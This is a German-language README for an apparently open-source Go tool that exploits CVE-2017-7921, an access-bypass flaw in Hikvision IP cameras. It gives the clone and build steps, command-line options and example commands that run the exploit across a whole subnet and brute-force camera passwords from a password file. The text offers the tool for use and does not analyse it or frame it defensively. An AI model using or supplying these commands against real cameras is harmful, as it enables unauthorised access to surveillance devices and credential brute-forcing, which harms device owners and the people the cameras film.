
Hikvision IP-Kamera-Zugriffsumgehungs-Exploit, entwickelt in Golang.
git clone https://github.com/MisakaMikato/cve-2017-7921-golang.git
cd cve-2017-7921-golang/src/cve-2017-7921-golang
go build .
cve-2017-7921 [-e] [-b] [--password password] [-t target] [--thread thread] [-timeout time]
Optionen:
-b Nutze Brute-Force-Modell
-e Nutze cve-2017-7921 Exploit-Modell
-o string
Lege den Ausgabepfad fest. Wenn leer, wird das Ergebnis auf stdout ausgegeben.
-password string
Setze das Passwort, wenn Brute-Force-Modell verwendet wird, oder Pfad zur Passwortdatei mit Syntax 'file:<path>' (Standard: "12345")
-t string
Ziel des Exploits, IP:Port oder Dateipfad, z.B. 127.0.0.1, oder Pfad zur Zieldatei mit Syntax 'file:<path>'
-thread int
Anzahl der gleichzeitigen Threads (Standard: 1)
-timeout int
Gebe das Ziel nach dieser Zeit auf. (Standard: 5)
Drücke 'w', um Fortschrittsinformationen zu erhalten :)
Beispiel
cve-2017-7921 -e -t 192.168.1.0/24 --thread 10 -o ./res.txt
cve-2017-7921 -b --password file:./pwds.txt -t 192.168.1.0/24 --thread 10